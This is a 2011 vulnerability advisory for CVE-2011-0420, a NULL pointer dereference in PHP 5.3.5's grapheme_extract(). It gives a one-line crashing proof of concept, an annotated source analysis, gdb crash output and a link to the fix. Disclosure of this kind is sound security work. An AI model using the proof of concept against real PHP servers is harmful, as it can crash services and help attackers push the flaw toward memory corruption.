[ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ]
Author: Maksymilian Arciemowicz
http://cxib.net/
Date:
- - Dis.: 09.12.2010
- - Pub.: 17.02.2011
CVE: CVE-2011-0420 
CERT: VU#210829
Affected Software:
- - PHP 5.3.5
Fixed: SVN
- --- 0.Description ---
Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts.
grapheme_extract — Function to extract a sequence of default grapheme clusters from a text buffer, which must be encoded in UTF-8.
- --- 1. PoC for grapheme_extract() ---
grapheme_extract('a',-1);
Change length of first parameter to change rip.
- --- 2. grapheme_extract() NULL Pointer Dereference ---
As we can see in grapheme_extract(str,size)
- -grapheme_extract()--
...
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) {  <=== str='a' and size='-1'
...
	/* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done.
		(size + 1 because the size-th character might be the beginning of a grapheme cluster)
	 */
	
	if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) { <=== ( size=-1+1=0 ) ===
        long nsize = ( size < str_len ? size : str_len );  <=== nsize = -1
		if ( NULL != next ) {
			ZVAL_LONG(next, start+nsize);
		}
		RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT
	}
...
- -grapheme_extract()--
if we call to grapheme_ascii_check(pstr,0) where
- -grapheme_ascii_check()--
/* {{{ grapheme_ascii_check: ASCII check */
int grapheme_ascii_check(const unsigned char *day, int32_t len) <==== len=0
{
	int ret_len = len;
	while ( len-- ) {
	if ( *day++ > 0x7f )
		return -1;
	}
	return ret_len; <=== return 0
}
- -grapheme_ascii_check()--
then we get (int)0 in result and 
long nsize = ( size < str_len ? size : str_len );
will be -1. Therefore,
		RETURN_STRINGL(((char *)pstr), nsize, 1);
give NULL pointer dereference here.
Changing length of first parameter of grapheme_extract(), we will also change rip in memcpy(3). 
(gdb) r -r 'grapheme_extract('a',-1);'
...
(gdb) x/i $rip
=> 0x7ffff5511d99 <memcpy+777>: mov    %rax,(%rdi)
(gdb) x/x $rax
0xf9891857a6e70f70:     Cannot access memory at address 0xf9891857a6e70f70
(gdb) x/x $rdi
0x11b2000:      Cannot access memory at address 0x11b2000
(gdb) r -r 'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',-1);'
...
(gdb) x/i $rip
=> 0x7ffff5511d77 <memcpy+743>: mov    0x18(%rsi),%r10     
(gdb) x/x $rsi
0x11b1fe8:      0x00000000  
- --- 3. Fix ---
CVS
http://svn.php.net/viewvc?view=revision&revision=306449
- --- 4. Greets ---
Pierre, Stas
- --- 5. Contact ---
Author: Maksymilian Arciemowicz